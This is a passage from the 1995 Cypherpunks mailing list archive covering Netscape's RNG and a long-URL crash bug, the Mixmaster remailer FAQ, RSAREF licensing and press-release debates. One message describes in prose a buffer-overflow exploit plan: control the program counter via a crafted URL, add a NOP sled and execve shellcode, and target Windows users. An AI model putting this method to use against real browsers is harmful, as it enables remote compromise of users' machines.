Brown at tel: 800-331-1664; tel: +1-617-890-0250; fax: +1-617-890-0875. The summary table of contents is available on the world wide web at http://infohaus.com/access/by-seller/Benjamin_Wright --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From drc at russell.moore.com Tue Sep 26 04:57:51 1995 From: drc at russell.moore.com (David R. Conrad) Date: Tue, 26 Sep 95 04:57:51 PDT Subject: New Netscape RNG In-Reply-To: <199509250649.CAA27099@clark.net> Message-ID: On Mon, 25 Sep 1995, Ray Cromwell wrote: > I just glanced at the new Netscape RNG source. I don't really see > anything bad, but I haven't analyzed it. However, I'm curious > as to why variables like the username or the language locality > are used as sources of entropy. These seem to provide almost nil. I, too, have only skimmed the code briefly. [Lots of good stuff deleted] > Using those sources probably can't hurt, they just seemed > like odd choices, "grasping for straws" so to speak. What isn't clear to me is how much entropy they are assigning to these sources. Certainly if they manage to get at least 128 bits of entropy then it doesn't matter how many non-random bits they mix into the hash. I think they are simply throwing everything but the kitchen sink in, and assuming that the overall result will be a sufficient number of bits of entropy. But it would be nice to at least see a few comments on how many bits they expect each individual source to provide. I also noticed that they use $HOME/.pgp/randseed.bin under unix, but they don't bother with %PGPPATH%\RANDSEED.BIN on PCs. I've sent Jeff a private message about this. David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad Hardware & Software Committee -- Finger conrad at grfn.org for public key Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From bsimpson at morningstar.com Tue Sep 26 05:00:30 1995 From: bsimpson at morningstar.com (William Allen Simpson) Date: Tue, 26 Sep 95 05:00:30 PDT Subject: Primality verification needed Message-ID: <1560.bsimpson@morningstar.com> While you folks are poking at Phil's latest, perhaps you could verify the others that he generated, already in the Photuris internet-draft: A 1024-bit strong prime (p), expressed in hex: 97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3 dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf 2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78 b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6 5e55 4313 828d a83b 9ff2 d941 dee9 5689 fada ea09 36ad df19 71fe 635b 20af 4703 6460 3c2d e059 f54b 650a d8fa 0cf7 0121 c747 99d7 5871 32be 9b99 9bb9 b787 e8ab The recommended generator (g) for this prime is 2. A 1024-bit strong prime (p), expressed in hex: a478 8e21 84b8 d68b fe02 690e 4dbe 485b 17a8 0bc5 f21d 680f 1a84 1313 9734 f7f2 b0db 4e25 3750 018a ad9e 86d4 9b60 04bb bcf0 51f5 2fcb 66d0 c5fc a63f bfe6 3417 3485 bbbf 7642 e9df 9c74 b85b 6855 e942 13b8 c2d8 9162 abef f434 2435 0e96 be41 edd4 2de9 9a69 6163 8c1d ac59 8bc9 0da0 69b5 0c41 4d8e b865 2adc ff4a 270d 567f The recommended generator (g) for this prime is 5. Bill.Simpson at um.cc.umich.edu Key fingerprint = 2E 07 23 03 C5 62 70 D3 59 B1 4F 5E 1D C2 C1 A2 From bdolan at use.usit.net Tue Sep 26 05:01:08 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Tue, 26 Sep 95 05:01:08 PDT Subject: Suspicious Action Reports Message-ID: ---------- Forwarded message ---------- [...] And as for FinCEN, it has recently become the repository for the new SAR's (Suspcious action reports) to be filed by all banking entities and replacing the multiple paperwork forms and sites, as stated in the Federal Register. One thing I noted was the expansion of surveillance responsibility for banks and other financial transaction organizations. And whether new or not, I experienced horror upon reading that financial institutions are supposed to file a SAR for any suspicious activity, as perceived by the bank, and is prohibited from disclosing the fact of the SAR to the subject and required to make financial transaction records, which must be retained for ten years, available to law enforcement "upon request" - a description which is lacking a search warrant. The regulations in the FR, identical for all institutions, actually discussed bankers and related organizations as entering into "partnerships" with the federal gestapo in naming names. Names, that is, of people and monetary transactions that bank and other financial facilities find "suspicious" - a subjective assessment based on whatever criteria happen to be in the minds of employees. From frissell at panix.com Tue Sep 26 05:02:10 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 26 Sep 95 05:02:10 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9509252047.AA01994@hplyot.obspm.fr> Message-ID: On Mon, 25 Sep 1995, Laurent Demailly wrote: > > It's not an exploit script, but you can find an auto crash "animation" > for Ray's discovered bug on > http://hplyot.obspm.fr/~dl/netscapesec/c1.html > (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) Crashes the 16-bit Windows version 1.1N. DCF From jya at pipeline.com Tue Sep 26 05:03:03 1995 From: jya at pipeline.com (John Young) Date: Tue, 26 Sep 95 05:03:03 PDT Subject: NYT on Nscp Flaw 3 Message-ID: <199509261017.GAA08915@pipe4.nyc.pipeline.com> The New York Times, September 26, 1995, p. D19. Hackers Alert Netscape to Another Flaw By Bloomberg Business News Mountain View, Calif., Sept. 25 -- The Netscape Communications Corporation said today that a third flaw had been discovered in its Internet access software by a group of computer hackers who call themselves the Cypherpunks. The hackers -- computer users and mathematicians who try to discover weaknesses in computer software and networks -- found a design flaw that can shut down Netscape's Navigator browser software, which helps people travel on the Internet. Two American college students last week broke Netscape's software security code, a design flaw that could jeopardize financial transactions done using Navigator. A month earlier, a French hacker broke a different Netscape security code. "We are learning a lot from these problems," said Michael J. Homer, vice president of marketing at Netscape. Shares of the company, which sold its first stock to the public last month, rose $4.25 today to close at $67 in Nasdaq trading. The latest flaw found by the hacker group is a programming error in Netscape software used to navigate the World Wide Web, a part of the Internet made up of photos, sounds and drawings. End] From mixmaster at obscura.com Tue Sep 26 05:06:50 1995 From: mixmaster at obscura.com (Mixmaster) Date: Tue, 26 Sep 95 05:06:50 PDT Subject: Mixmaster Remailer FAQ Message-ID: <199509261140.EAA01736@obscura.com> Frequently Asked Questions about Mixmaster Remailers [FAQ Verson 1.5 Sept 22 1995] by Lance Cottrell This document is a semi-technical discussion of Mixmaster remailers. I wrote this to answer questions often asked by new users of Mixmaster, and to explain why you would want to use Mixmaster remailers. At the end of this FAQ is a list of currently active Mixmaster remailers. What is the most recent version of Mixmaster? I am pleased to announce the release of Mixmaster 2.0.2 It contains many bug fixes. It also provides random remailer chaining. What is Mixmaster? Mixmaster is a new class of anonymous remailers. Inspired by the existing "cypherpunk" remailers and discussions on the Cypherpunk mailing list , Mixmaster is the next generation in the evolution of remailer technology. What is an anonymous remailer? Quoting from Andre Bacard's remailer FAQ: An anonymous remailer (also called an "anonymous server") is a free computer service that privatizes your e-mail. A remailer allows you to send electronic mail to a Usenet news group or to a person without the recipient knowing your name or your e-mail address. For a non-technical introduction to remailers (not including Mixmaster), I recommend Andre's FAQ. It is posted regularly to: alt.privacy,alt.privacy.anon-server,alt.anonymous or you can get it by sending mail to: To: abacard at well.com Subject: Help1 Message: [Ignored] What do I need to use Mixmaster remailers? Unlike other remailers, you can't just make your own message and send it to the remailer. Mixmaster's security comes in part from using a special message format. The disadvantage of this is that you need a special program to make the message for you. Once you have that program (the client) remailing is as easy as running the program, and telling it which remailers you want to use. How do I get the Mixmaster client software? There are two sites for distribution. The first is my machine: http://obscura.com/~loki/Welcome.html/ or ftp to obscura.com and read /pub/remail/README.no-export The other is by anonymous ftp to jpunix.com You will have to follow the instructions there to get Mixmaster. Because Mixmaster contains cryptography, it may not be exported from the U.S and Canada. The reason for the circuitous route to download Mixmaster is to show my good faith efforts to keep Mixmaster from being exported. I have heard rumors that someone has already broken this law, and that Mixmaster is available from Europe. I do not approve of this and will not support that site. How do I get the software to run a Mixmaster remailer? The remailer software is available from the same sites as the client. But I only see one Mixmaster distribution? The same program is used for both the client and the remailer. The only difference is in the installation. For the client you just compile it and you are ready to go. For the remailer, you need to set up mail forwarding and cron jobs. What kinds of computers does Mixmaster run on? Unfortunately, not PCs or Macs. But it is being ported to those right now. Mixmaster runs under UNIX. The only machine it is known not to work on is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3, Solaris, and several others. It has been compiled and tested on Netcom. If you use it on a machine or service not on this list, please let me know so I can add it. How does Mixmaster work, and why should I use it? You should use Mixmaster if you want the highest level of anonymity available, or if your are tired of building remailer messages your self. A discussion of how Mixmaster provides this level of security is beyond the scope of this FAQ, but I put an essay on the subject on my home page Does Mixmaster use PGP? No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own keys and key file formats. To add a key to a key ring, simply append the key to your key file using your favorite text editor. When Was Mixmaster Released? Mixmaster was originally released on an experimental basis in late 1994. There were only ever two remailers running Mixmaster 1.0. Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly available Mixmaster remailers. What is the latest version of Mixmaster? Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can now accept messages containing multiple Mixmaster packets. Mixmaster can be told to choose a random set of remailers to chain your message through. It will now route multiple packet messages over independant chains. Several minor bugs were fixed. Version 2.0.1 was released on May 27, 1995. The only changes from 2.0 are some improvements in the documentation, and the inclusion of a more up to date list of remailers. What remailers run Mixmaster? The most recent list of remailers is available on my homepage, along with the remailer list and key file for Mixmaster. You can simply replace your old files with the ones from my site to keep up to date. These files are in ftp://obscura.com/pub/no-export/ They are also available by ftp. Here is the current list of Mixmaster remailers. Send mail to the remailer with the subject remailer-key to retrieve the remailers Mixmaster key. mix mixmaster at obscura.com vishnu mixmaster at vishnu.alias.net crown mixmaster at kether.alias.net knight mixmaster at aldebaran.armory.com robomix robo at c2.org hroller hroller at c2.org syrinx syrinx at c2.org replay remailer at replay.com hacktic remailer at utopia.hacktic.nl crynwr remailer at crynwr.com spook remailer at spook.alias.net flame remailer at flame.alias.net gondolin mixmaster at gondolin.org q q at c2.org Armadillo remailer at armadillo.com precipice mixmaster at mix.precipice.com anon mixmaster at anon.alias.net secrets secret at secret.alias.net Since this is a new FAQ, I am sure it is far from comprehensive. Watch this space for changes to the FAQ. It will be evolving rapidly for a while. Please send any questions you think should be here to: loki at obscura.com My outpost on the WWW is From sentiono at cycor.ca Tue Sep 26 05:23:58 1995 From: sentiono at cycor.ca (Sentiono Leowinata) Date: Tue, 26 Sep 95 05:23:58 PDT Subject: Netscape for OS/2, when? (Re: Another Netscape Bug) Message-ID: <199509261223.JAA01800@bud.peinet.pe.ca> On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote: >> It's not an exploit script, but you can find an auto crash "animation" >> for Ray's discovered bug on >> http://hplyot.obspm.fr/~dl/netscapesec/c1.html >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) >Crashes the 16-bit Windows version 1.1N. >DCF Same here. For more information (not Netscape related), Web Explorer 1.02 for OS/2 also crashes for the long URL. I wish Netscape will port it to OS/2 (already ask them, but no comment from Netscape). I don't try it on Netscape 1.1N as it doesn't run reliably under Win-OS/2 (10 min -> crash! ;) ------------------------------------------------------ Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada System Engineer/Programmer Analyst - Cycor Communications Inc. sentiono at cycor.ca, 902-629-2488, http://www.cycor.ca/ From craig at passport.ca Tue Sep 26 05:29:18 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 26 Sep 95 05:29:18 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! In-Reply-To: <199509202015.QAA05462@frankenstein.piermont.com> Message-ID: > "Vladimir Z. Nuri" writes: > > I'm going to argue against TCM and others who are opposed to a > > "cypherpunk press release" because this is not an "organized group". > > Look, L. (may I call you L.?) -- > > we've gone over this many times. We aren't a group. We're a mailing > list. We've got a diversity of opinions, and we have no organization > -- nor do we want one. True enough, but there are sometimes rough consenses on technical questions, and if it were clear enough that these were collective in nature and not to be ascribed to any particular person, e.g.: "Consensus on cypherpunks seems to be that 40 bit encryption is not viable for commercial applications, and that Netscape seems to have taken less than due care to choose an appropriate random seed for its session keys." -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From craig at passport.ca Tue Sep 26 05:30:22 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 26 Sep 95 05:30:22 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: > -----BEGIN PGP SIGNED MESSAGE----- > > We've seen the word "hacker" kicked around rather arbitrarily in the press. > Are we to conclude that the cypherpunks are a bunch of hackers? I think its Heh. Seems so. > time for some cypherpunks spin. How about a logo *and* a press release? The > press release would give contacts (email, phone, etc.) so that someone on > this list would be contacted by journalists when a crypto story breaks. Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ? Should we assign someone to be 'our' lawyer ? I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and print enough, and know how to handle and present myself to the press, but if this is considered an 'honor' rather than a 'pain in the ass and potential legal lightning rod' then I'd like to suggest someone with a longer pedigree who has been writing more code lately take it on. Tim ? > If we get enough volunteers, we can fax blanket every newspaper, station, > and network in the world. Sure. -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From drc at russell.moore.com Tue Sep 26 05:42:01 1995 From: drc at russell.moore.com (David R. Conrad) Date: Tue, 26 Sep 95 05:42:01 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <199509251159.EAA08528@mycroft.rand.org> Message-ID: On Mon, 25 Sep 1995, Jim Gillogly wrote: > > jsw at neon.netscape.com (Jeff Weinstein) writes: > > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, > > and feed it through the RNG hash. > > Interesting idea, but I have a (perhaps irrational) dislike for this idea. > If Netscape wants to have its own netsceed.bin file to muck around with on > my system, I'll authorize it to be set up, but I by god don't want it > mucking around with my PGP setup. ... I thought about this a bit, but I don't think that reading randseed.bin counts as "mucking around with" the "PGP setup." PGP launders randseed.bin before saving it for just this reason, so that reading it won't reveal information on the user's session keys. And the Netscape folks have published the source code which shows that they only read the file and hash it with MD5. That the contents of randseed.bin have been mixed into an MD5 hash with a bunch of other things can hardly be called a security hole, in my estimation. David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad Hardware & Software Committee -- Finger conrad at grfn.org for public key Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From wb8foz at nrk.com Tue Sep 26 05:58:03 1995 From: wb8foz at nrk.com (David Lesher) Date: Tue, 26 Sep 95 05:58:03 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9509220814.AA06967@cs.umass.edu> Message-ID: <199509260411.AAA00090@nrk.com> I gather the Wall Street Journal is subscribed to 'punks -- seeing as how I hear they were discussing the overflow bug today. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From tcmay at got.net Tue Sep 26 05:59:15 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 26 Sep 95 05:59:15 PDT Subject: More on "Entropy" Message-ID: At 5:29 PM 9/25/95, David Van Wie wrote: >David Van Wie wrote: > >>>The entropy E is defined by the sum across n states of -P_i log_2(P_i), > >Timothy C. May wrote: > >>Hah! Another physicist converted to the information-theoretic view of >entropy! > >Indeed. I was able to track down the literature, and it is most >interesting. I am still a little bit skeptical of the "superset including >thermodynamic entropy" school of thought, but I haven't finished reading all >of the materials yet! Clearly, the IT "version" of entropy is a well >defined and useful thing.... Well, the more you adapt to the information theory point of view, the more the Shannon-Kolmogoroff-Chaitin definitions become the natural ones, then the more the whole "thermodynamic" definition of entropy will seem the odd one. One is left with the conclusion that Gibbs-style entropy has _something_ fundamental to do with information theory, and can then consider what those relationships may be. But, perforce, one is left with the most basic interpretation of algorithmic complexity: the complexity of a system is related to the length of the algorithm describing it. A "random" system is one which has no shorter algorithmic description than itself. (The connection of this statement to IQ test questions about describing a sequence is left as an IQ test question for the reader.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ChristopherA at consensus.com Tue Sep 26 06:00:33 1995 From: ChristopherA at consensus.com (Christopher Allen) Date: Tue, 26 Sep 95 06:00:33 PDT Subject: Please send me SSL problems... Message-ID: At 3:04 AM 9/20/95, Jeff Weinstein wrote: > I'd just like to let all cypherpunks know that I'm really interested in >getting any feedback you might have about security problems with Netscape >products. I'm particularly interested in bugs in the our implementation >of SSL, and problems in the protocol that are not addressed in SSL 3.0. > > We have been collecting comments on SSL 3.0, and have started incorporating >that feedback into our spec. Please don't assume that our lack of response >means that we are ignoring your comments. Between Navigator 2.0 and >things like the SSL challenge and the RNG fire drill, we just have not had >the time to get a new rev of the spec out. Hopefully soon... As you may know, Jonathan, who is an active member this list, has already written about Consensus' intention to continue to upgrade RSAREF. We'd like to help make sure that RSAREF stays in sync with SSLREF as we upgrade it. For instance, the next major release of RSAREF will be encrypting the private key (which now has to be done outside of RSAREF.) One area in particular we could use some feedback on from you: Currently SSLREF makes 4 calls that are not in the published program interface of RSAREF. These calls are DES_CBCInit, DES_CBCUpdate, RSAPublicEncrypt, RSAPrivateEncrypt. With your license with RSA for RSAREF you are allowed to go under the published interface by using the DES routines only for securing the channel, and the RSA routines are limited to endpoint authentication only. >From what I've heard, SSLREF 3.0 may go beyond those limits, requiring SSLREF 3.0 developers only to use RSA's BSAFE rather than the less expensive (or at least, no up-front fee) RSAREF. What Consensus Development would like to do is extend the RSAREF API such that RSA's concerns as regards direct access to those routines is taken care of, and can be called by non-PEM/non-Mail applications such as SSLREF. We need to extend the API for PGP, so ideally anything new we add to the API should be general purpose as possible, yet also deal with RSA's issues. BTW, to explain RSA's issues regarding the RSAREF API: Consensus is contractually required to get prior approval before licensing RSAREF for any program that goes underneath the published API. This allows RSA to make sure that these routines are not used in patented ways that RSA does not have rights to. In designing new API and getting them to sign off on the new API allows us to offer licenses to anyone without getting RSA's prior approval. ------------------------------------------------------------------------ ..Christopher Allen Consensus Development Corporation.. .. 1563 Solano Avenue #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. From rjc at clark.net Tue Sep 26 06:10:22 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 06:10:22 PDT Subject: Hack Microsoft? Message-ID: <199509260404.AAA14297@clark.net> Microsoft recently got C2-security status approved for Windows NT by the National Computer Security Center, a division of the NSA. They are supposed to put systems through "laborious testing and review" before they approve C2. So, if one can find bugs in NT's security, one can toss a little more egg on the NSA's face and the sham that part of their activies to *help* to secure american computers. A simple violation of NT's C2 status would be to demostrate a flaw in it's memory protection implementation. Personally, I think NT is *riddled* with bugs waiting to be discovered. Hell, even the NT "service pack" is included in the C2 status, which I bet has plenty of holes. If Cypherpunks can find flaws that the NSA can't, or won't divulge, what does that say about their so-called COMSEC ability. -Ray From hugh at ecotone.toad.com Tue Sep 26 06:10:41 1995 From: hugh at ecotone.toad.com (Hugh Daniel) Date: Tue, 26 Sep 95 06:10:41 PDT Subject: ADMIN: Sudden CP Vacation, rest up while you can... Message-ID: <9509261309.AA04686@ecotone.toad.com> Toad.com (the cypherpunks host machine provided by John Gilmore) was down today for about 12 hours due to disk/netnews problems, and not the NSA or little green men (is there a difference...? :r) ||ugh Daniel Majordomo Potty Trainer Owner-Cypherpunks at toad.com hugh at toad.com From shamrock at netcom.com Tue Sep 26 06:10:53 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 26 Sep 95 06:10:53 PDT Subject: Netscape "random" number seed generator code available Message-ID: <199509260259.WAA20138@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim Gillogly) wrote: >I'm nervous enough about all the Easter Eggs that have been reported in >Netscape, like the secret keystroke shortcut to get to Fishcam, or the >different behavior it exhibits when it finds a certain obscurely-named >directory at the top level. Would you please elaborate? TIA, - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGdsfSoZzwIn1bdtAQG3ZwGAk5ZFceYsUmo9OgQJ9oVZGcNcXnorr9a2 cLP/xy3vB/COr3uKjfr0mcYY6JMMLxfa =nXHi -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Sep 26 06:11:23 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 26 Sep 95 06:11:23 PDT Subject: Security Update news release Message-ID: <199509260306.XAA20157@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9509251617.ZM167 at tofuhut>, jsw at netscape.com ("Jeff Weinstein") wrote: >-- >--PART-BOUNDARY=.19509251617.ZM167.tofuhut >Content-Type: text/plain; charset=us-ascii > > Here is the press release we put out this morning regarding the fix >for RNG seed and stack overflow problems. Do the new versions use PGP's randseed.bin? If Netscape even only looks at data used to keep PGP secure, Netscape will be banned from my computer and every computer I am responsible for. -- For good. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGduUCoZzwIn1bdtAQFEgwGA3265JY1cahyqqd2VEe+1RPXI96DQBPRV r1EWdjxzjgXvxplLMagh9yWOPBq9OKRX =F3qb -----END PGP SIGNATURE----- From jeffb at sware.com Tue Sep 26 06:16:11 1995 From: jeffb at sware.com (Jeff Barber) Date: Tue, 26 Sep 95 06:16:11 PDT Subject: truerand Message-ID: <9509261314.AA00248@wombat.sware.com> Could someone please send me a copy of the truerand code Matt Blaze posted yesterday? I inadvertently deleted the message and Todd's Cpunk archives seem to have shut down about a month ago. Many thanks. -- Jeff From shamrock at netcom.com Tue Sep 26 06:16:16 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 26 Sep 95 06:16:16 PDT Subject: Golden Coy Freeh Message-ID: <199509260246.WAA20098@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , paulp at CERF.NET (Paul Phillips) wrote: >On Mon, 25 Sep 1995, John Young wrote: [...] >> If the head of the F.B.I. acknowledged that his agency was >> powerless to crack a cryptography program like Pretty Good >> Privacy, the stampede for that software on the Internet >> would make the run on Windows 95 look puny. > >That's a bizarre and naive statement. Is there anyone that thinks the >spread of strong crypto has been less than rapid only because people are >afraid it won't protect them against the government? Um, sorry, no. The general public doesn't use PGP. If the FBI director admitted that using PGP is safe even against the FBI, the general public just might become aware of it. Perhaps the statement isn't so naive after all. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGdpbioZzwIn1bdtAQG5zwGAmmSuPLdrDV9rBAUmJFuywUC4x1KgeVqP HiD9C8pP+L5xkZw8pyH8xhwfKPZeKOHb =w1IS -----END PGP SIGNATURE----- From sameer at c2.org Tue Sep 26 06:17:02 1995 From: sameer at c2.org (sameer) Date: Tue, 26 Sep 95 06:17:02 PDT Subject: getting netscape to support the remailers Message-ID: <199509260239.TAA14898@infinity.c2.org> I started thinking about what it would take to get Netscape to support sending mail through the remailers, after having read the S/MIME specs which Netscape 2.0 is apparently going to support. Perhaps with enough browbeating Netscape 3.0 will support the remailers. I think that in order to get netscape to support the remailers the remailers will have to: A) Support S/MIME B) Have a documented protocol, MIME-related Did Ray Cromwell do some work towards MIMEifiying the remailers? My impression of his work back when he posted was that it trusted the remailers too much, but perhaps my memory is flawed-- in any case his work may be helpful towards developing a remailer standard, which could then help get support incorporated into MIME agents. I will begin work on a preliminary specification, and post my results. I figure MIME remailers would allow for: 1) Transparent reply-blocks Someone could have a multipart mime message where one of the parts is Content-Type: reply-block and the MUA would see that and understand to send replies with that reply block to the remailers. I will be posting more as I work out the details. I welcome comments, suggestions, etc., as I figure that my initial specification will require much improvement. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From JonathanZ at consensus.com Tue Sep 26 06:17:53 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Tue, 26 Sep 95 06:17:53 PDT Subject: RSA/Cylink arbitration agreement on-line Message-ID: At 7:13 AM 9/25/95, Brian A. LaMacchia wrote: >[I haven't seen this mentioned yet on the list...] > >Cylink has been kind enough to put a copy of the arbitration panel's >decision on their web page. Cylink's home page is www.cylink.com. The >URL for the actual agreement is: > > http://www.cylink.com/arbtrn_1.html > >Spin doctors aside, it doesn't look like either company gained much over >the other. I'm not an attorney, but the way I read the agreement RSAREF >can continue to be used without violating the Stanford patents. RSA DSI >cannot *sublicense* the Stanford patents to third parties, but can *sell >code* that practices the methods claimed in the Stanford patents. That >code can then be incorporated into other products, which is exactly what >PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which >is covered by the RSAREF license agreement). > As far as I can tell, that seems to sum it up. In addition, RSA agrees in all their contracts to indemnify the licensee regarding RSA's rights to assign the various technologies. When I called to speak to them, they reiterated their stance. Since, we are going to be handling RSAREF, the validity of RSAREF licenses was of some importance. Having gone through the arbitration ruling things seem to be on track. I'll post more of this to the RSAREF Announce list for folk. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From rjc at clark.net Tue Sep 26 06:21:38 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 06:21:38 PDT Subject: Decompiling Netscape In-Reply-To: Message-ID: <199509260153.VAA11436@clark.net> Doug, I've managed to find a URL which can place an arbitrary value in the PC register without disassembly. What I did was make a URL abcdefg....ABCDEFG....ZAaBbCcDd.....ZzAAaaBBbbCCcc.....ZZzz then, when Netscape coredumped and the PC gets modified, I look at the PC, say 0x54535251 and see that it is QRST, so I place the PC register there. Now all I need is some 386 code under BSDI2.0 to do an execve. I just wrote a simple execve in C, compiled it, and stole the appropriate magic kernel library invocation sequence. What I need to do now is 1) find out the approximate address of the stack pointer, 2) generate some code that has a whole lotta NOPs, followed by the execve sequence, and finally, preface all that by a PC value that will hopefully land somewhere inside that field of NOPs on the stack. And all this has to be done without using any characters which will stop netscape from reading in more pieces of the domain string. You might be able to use the same techniques to whip up a quick exploit on your systems. By far, the best exploits will be on the Mac and Windows (especially), because those make up the majority of people using Netscape. Create an exploit on Windows, and stun the world. ;-) -Ray From lharrison at mhv.net Tue Sep 26 06:22:50 1995 From: lharrison at mhv.net (Lynne L. Harrison) Date: Tue, 26 Sep 95 06:22:50 PDT Subject: List of US representitives Message-ID: <9509260213.AA29843@mhv.net> -----BEGIN PGP SIGNED MESSAGE----- At 01:37 PM 9/25/95 EST, Brian Gorka wrote: >Someone posted a list of US reps awhile back... Can someone forward me a copy? >Thanks. Brian, Here's the list you requested. Linda Thompson (lindat at iquest.net) posted this in August, 1995. Regards - Lynne ++++++++++ senator at boxer.senate.gov senator_brown at brown.senate.gov, sen_dodd at dodd.senate.gov, senator_lieberman at lieberman.senate.gov, joe_biden at biden.senate.gov, senator_coverdell at coverdell.senate.gov, tom_harkin at harkin.senate.gov, chuck_grassley at grassley.senate.gov, larry_craig at craig.senate.gov, dirk_kempthorne at kempthorne.senate.gov, senator at simon.senate.gov, senator at moseley-braun.senate.gov, wendell_ford at ford.senate.gov, senator at breaux.senate.gov, senator at johnston.senate.gov, senator at kennedy.senate.gov, john_kerry at kerry.senate.gov, senator at mikulski.senate.gov, senator at levin.senate.gov, mail_grams at grams.senate.gov, senator at wellstone.senate.gov, john_ashcroft at ashcroft.senate.gov, max at baucus.senate.gov, conrad_burns at burns.senate.gov, bob at kerrey.senate.gov, mailbox at gregg.senate.gov, opinion at smith.senate.gov, senator at bradley.senate.gov, senator_Bingaman at bingaman.senate.gov, senator_domenici at domenici.senate.gov, senator_reid at reid.senate.gov, senator_dewine at dewine.senate.gov, nickles at rpc.senate.gov, lugar at iquest.net senator_chafee at chafee.senate.gov, senator at hollings.senate.gov, tom_daschle at daschle.senate.gov, larry_pressler at pressler.senate.gov, senator_frist at frist.senate.gov, senator at hutchison.senate.gov, senator_robb at robb.senate.gov, senator at warner.senate.gov, senator_leahy at leahy.senate.gov, vermont at jeffords.senate.gov, senator_Gorton at gorton.senate.gov, russell_feingold at feingold.senate.gov, senator at rockefeller.senate.gov, everett at hr.house.gov, budmail at hr.house.gov, sbachus at hr.house.gov, jdickey at hr.house.gov, edpastor at hr.house.gov, dcaucus at hr.house.gov, woolsey at hr.house.gov, gmiller at hr.house.gov, sfnancy at hr.house.gov, talk2tom at hr.house.gov, petemail at hr.house.gov, annagram at hr.house.gov, tellnorm at hr.house.gov, zoegram at hr.house.gov, samfarr at hr.house.gov, george at hr.house.gov, andrea22 at hr.house.gov, tellbuck at hr.house.gov, jharman at hr.house.gov, tucker96 at hr.house.gov, housesst at hr.house.gov, rpackard at hr.house.gov, skaggs at hr.house.gov, schaefer at hr.house.gov, bozrah at hr.house.gov, cshays at hr.house.gov, delaware at hr.house.gov, kthurman at hr.house.gov, 